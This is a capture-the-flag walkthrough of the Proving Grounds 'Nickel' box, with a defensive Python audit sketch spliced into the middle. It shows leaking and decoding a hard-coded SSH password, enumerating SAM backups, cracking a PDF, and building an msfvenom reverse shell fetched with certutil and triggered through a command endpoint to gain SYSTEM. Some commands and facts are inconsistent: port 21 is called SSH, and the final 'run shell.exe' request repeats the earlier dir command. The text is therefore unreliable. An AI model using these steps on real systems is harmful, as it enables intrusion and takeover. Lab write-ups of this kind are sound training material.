
Nickel – Proving Grounds Walkthrough

Nickel is rated by the Proving Grounds community as “very hard”. It is also listed as one of the best boxes to practice on for the OSCP certification. We start, as always, with nmap.

sudo nmap -sC -sV -p-

FileZilla is not accepting anonymous FTP login.

SSH on port 21 and RDP on 3389 are rarely the initial entry points, but they are something we can keep in mind if we come across some credentials.

Open a web browser and navigate to ports 8089 and 3333, for our HTTP servers. Port 8089 seems to be some type of dev environment.

Clicking a button redirects to another IP, which is interesting, but also to port 33333, which is our other server.

Start Nikto;

Let’s try to curl these pages, as that can often reveal interesting information we can throw into Burp Suite.

The error is interesting: “Cannot GET”. I have had success on occasion by changing the request type to POST.

It requires a Content-Length, which we can specify with the following;

curl -d "" -X POST

Success! We get a list back of the running processes. The most interesting to us is an entry with what appears to be hard-coded credentials using the SSH protocol. SSH was on our NMAP so we are likely getting close.

The password looks Base64 encoded. So let’s decode in Kali.

echo -n Tm93aXNlU2xvb3BUaGVvcnkxMzkK | base64 --decode
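Seen from the defender's side, the finding above is that a secret passed as a command-line argument is readable by anything that can list processes, and Base64 adds no protection. The following audit sketch is an added example, not part of the original walkthrough; the flag names it looks for and the sample process list are constructed assumptions.

```python
import base64
import binascii
import re

# Assumed (hypothetical) set of secret-bearing flags; extend for your own tooling.
SECRET_FLAG = re.compile(
    r"""(?i)(?:^|\s)-{1,2}(p|pass|password|token|secret)(?:=|\s+)["']?([^\s"']+)"""
)

def decode_if_base64(value):
    """Return the decoded text if value is Base64 of printable ASCII, else None."""
    if len(value) < 8 or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii").strip()
    except (binascii.Error, ValueError):
        return None
    return text if text and text.isprintable() else None

def audit_process_list(command_lines):
    """Flag command lines that pass a secret as an argument, encoded or not."""
    findings = []
    for lineno, cmd in enumerate(command_lines, start=1):
        match = SECRET_FLAG.search(cmd)
        if not match:
            continue
        decoded = decode_if_base64(match.group(2))
        findings.append({
            "line": lineno,
            "flag": match.group(1),
            "encoding": "base64" if decoded is not None else "plaintext",
            "secret": decoded if decoded is not None else match.group(2),
        })
    return findings

# Constructed sample data: process names, accounts and secrets are invented.
_ENCODED = base64.b64encode(b"Constructed-Secret-01\n").decode()
SAMPLE_PROCESSES = [
    r"svchost.exe -k netsvcs",
    rf'deploy.exe --user svc_build -p "{_ENCODED}" --protocol ssh',
    r"backup.exe --password Winter2024! --target \\nas\share",
    r"notepad.exe C:\notes\todo.txt",
]

if __name__ == "__main__":
    for f in audit_process_list(SAMPLE_PROCESSES):
        print(f"line {f['line']}: -{f['flag']} carries a {f['encoding']} secret")
```

Both the encoded and the plaintext case are reported as findings, since an encoded argument is recoverable in one step; the fix is to keep secrets out of the command line entirely.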

We use these new credentials to log into an SSH shell;

The first commands I use when getting a Windows shell are below. They enumerate the OS, check privileges for JuicyPotato, look in common password locations and run netstat.

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" 
whoami /priv
netstat -nao
dir C:\Windows\System32\config\RegBack\SAM
dir C:\Windows\System32\config\RegBack\SYSTEM

Of note with the netstat command is port 80, which was not available on our original nmap scan.

Let’s hunt around user folders. We don’t find anything in Ariah’s download folder, documents or desktop (except the user flag). In the root of C:\ we see the folder FTP.

Let’s download this file to our Kali box using SCP. Start an SSH server if it is not already running.

systemctl start ssh.socket 

Transfer the file;

scp ariah@ . 

The .pdf file is password-protected, and although we can use John to crack the file, I prefer a tool called PDFCrack. Let’s see if it is in the Kali repository and install it.

PDFCrack simply needs the -f and -w switches for the file and the word-list location.

Password “ariah4168” is recovered. Let’s open the file.

This is new and very interesting information to us. The document references some webservers which were not in our initial scan. It also mentions a command endpoint.

We already know port 80 is running on this machine so the information in this document might be our next path forward.

Let’s try and use the command endpoint.

This is a good sign. The aim now is to get a reverse shell onto this machine and abuse this endpoint to run it, as the shell will come back as SYSTEM. Let’s create the shell.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=80 -f exe > shell.exe

Start a webserver.

sudo python3 -m http.server 80

Use certutil from ariah’s SSH shell to download the shell.

certutil.exe -urlcache -split -f "" 

Kill the HTTP server and start netcat on port 80, as that is the port we created our shell.exe with.

Back in Ariah’s SSH shell, let’s use the curl command to try and find our shell.exe before we run it, just to make sure our syntax is correct.

I don’t get the expected results. We need to URL-encode this command. Find any website to do this.

Re-run and we get the expected results.

curl http://localhost/?cmd%20%2Fc%20dir%20c%3A%5Cusers%5Cariah%5C

Run the file with an updated encoded URL which will execute shell.exe.

curl http://localhost/?cmd%20%2Fc%20dir%20c%3A%5Cusers%5Cariah%5C

And our shell comes back as SYSTEM.

Definitely an interesting one! I hope you enjoyed.


Mark likes CTFs, his home lab and walks on the beach. He holds SANS certifications in Forensics and Information Security. Currently working in the cybersecurity field.